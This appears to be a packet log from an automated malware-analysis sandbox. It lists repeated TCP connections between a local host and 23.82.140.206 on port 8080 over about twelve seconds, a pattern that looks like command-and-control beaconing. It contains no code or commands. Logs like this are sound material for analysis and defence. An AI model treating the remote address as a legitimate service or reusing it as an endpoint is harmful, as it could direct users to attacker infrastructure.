                                          Sep 27, 2021 20:27:10.713001966 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.713032007 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.713058949 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.713253975 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.713282108 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.713309050 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.713365078 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.714041948 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.840214968 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.978599072 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.103926897 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.104948044 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.104990005 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.230256081 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.232604980 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.232774019 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.357753038 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.357856989 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.358329058 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.361500978 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.483840942 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.488605022 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.489378929 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.489449978 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.489481926 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.489527941 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.489572048 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.489593029 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.489623070 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.489716053 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.490559101 CEST499688080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.615915060 CEST80804996823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.748811960 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.881604910 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:11.882499933 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:11.883246899 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.015100956 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.018389940 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.018605947 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.149533987 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.152837038 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.153347969 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.156187057 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.284032106 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.287030935 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.288146019 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.288458109 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.288619995 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.288664103 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.288685083 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.288685083 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.288721085 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.288732052 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.288762093 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.288769960 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.288836002 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.289450884 CEST499698080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.420124054 CEST80804996923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.539429903 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.671099901 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.672760963 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.672802925 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.804588079 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.807985067 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.808242083 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.940089941 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:12.942926884 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.943460941 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:12.947376966 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.074959993 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.078965902 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.081098080 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.081135035 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.081163883 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.081188917 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.081212997 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.081233978 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.081311941 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.081403971 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.082218885 CEST499708080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.213912964 CEST80804997023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.338582039 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.464557886 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.465015888 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.465935946 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.593853951 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.595675945 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.595905066 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.721075058 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.721283913 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.721810102 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.725187063 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.846903086 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.850208044 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.852128029 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.852176905 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.852215052 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.852247000 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.852277994 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.852303028 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:13.852343082 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.852467060 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.853293896 CEST499718080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:13.980473995 CEST80804997123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.117727041 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.244026899 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.245270967 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.245311022 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.370568991 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.373223066 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.373364925 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.500371933 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.500808954 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.501442909 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.506522894 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.627274990 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.631994009 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.632600069 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.632697105 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.632724047 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.632750034 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.632796049 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.632813931 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.632850885 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.632934093 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.633766890 CEST499728080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:14.760509968 CEST80804997223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:14.884537935 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.016832113 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.017039061 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.017761946 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.149936914 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.151951075 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.152103901 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.285178900 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.285430908 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.285815954 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.289036036 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.418111086 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.421278954 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.422092915 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.422167063 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.422257900 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.422301054 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.422370911 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.422405958 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.422446012 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.422463894 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.422517061 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.422631025 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.423913956 CEST499738080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.555790901 CEST80804997323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.681773901 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.813205957 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.813388109 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.813960075 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:15.944663048 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.946424961 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:15.946721077 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.077492952 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.077749014 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.078279018 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.081450939 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.209012985 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.212358952 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.213970900 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.214215040 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.214490891 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.214612007 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.214632988 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.214698076 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.214721918 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.214776039 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.214983940 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.215069056 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.215343952 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.215445042 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.215933084 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.215955019 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.348134041 CEST80804997423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.348329067 CEST499748080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.462893963 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.593475103 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.593736887 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.602406025 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.728969097 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.729012012 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.729132891 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.854695082 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.854913950 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.855539083 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.859006882 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.981522083 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.984653950 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.986644983 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.986681938 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.988226891 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.988260031 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.988642931 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.988671064 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:16.989279985 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.989300013 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.989301920 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:16.989396095 CEST499758080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.119632959 CEST80804997523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.243858099 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.374772072 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.374882936 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.375607967 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.506525993 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.509146929 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.509387016 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.640475988 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.640548944 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.641016960 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.643444061 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.772092104 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.774295092 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.775729895 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.775860071 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.775922060 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.775945902 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.776001930 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.776083946 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.776087046 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.776115894 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.776137114 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:17.776201010 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.781050920 CEST499768080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:17.912919044 CEST80804997623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.040344000 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.167860985 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.169524908 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.169555902 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.295464039 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.299010992 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.299212933 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.425340891 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.425617933 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.426364899 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.429732084 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.552342892 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.555917025 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.557862997 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.557923079 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.557944059 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.557955027 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.557987928 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.557992935 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.557997942 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.558065891 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.558084965 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.558113098 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.558155060 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.558769941 CEST499778080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.684397936 CEST80804997723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.806638956 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.932035923 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:18.932163000 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:18.933058023 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.058693886 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.471260071 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.471339941 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.596982956 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.597067118 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.597559929 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.600723028 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.723268986 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.726610899 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.727392912 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.727510929 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.727536917 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.727616072 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.727619886 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.727659941 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.727664948 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.727689981 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.727711916 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.727713108 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.727734089 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.727770090 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.728713036 CEST499788080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:19.854866028 CEST80804997823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:19.979423046 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.111407995 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.111598969 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.112814903 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.244462013 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.245440960 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.245539904 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.377402067 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.377506018 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.377886057 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.380980968 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.509669065 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.513093948 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.514353037 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.514386892 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.514410019 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.514422894 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.514431953 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.514451027 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.514452934 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.514472961 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.514497042 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.514523029 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.517307043 CEST499798080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.648793936 CEST80804997923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.790672064 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.922264099 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:20.922386885 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:20.922985077 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.055592060 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.056184053 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.056288958 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.187871933 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.187977076 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.188410044 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.192049980 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.322494984 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.324392080 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.325062037 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.325948000 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.325988054 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.327459097 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.327486992 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.327541113 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.327569008 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.327586889 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.327682972 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.328696966 CEST499808080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.460642099 CEST80804998023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.587671041 CEST499818080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.712635040 CEST80804998123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.715363979 CEST499818080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.716226101 CEST499818080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.841348886 CEST80804998123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.842943907 CEST80804998123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.843054056 CEST499818080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.967598915 CEST80804998123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:21.968291998 CEST499818080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.968760967 CEST499818080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:21.971553087 CEST499818080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:22.093185902 CEST80804998123.82.140.206192.168.2.7
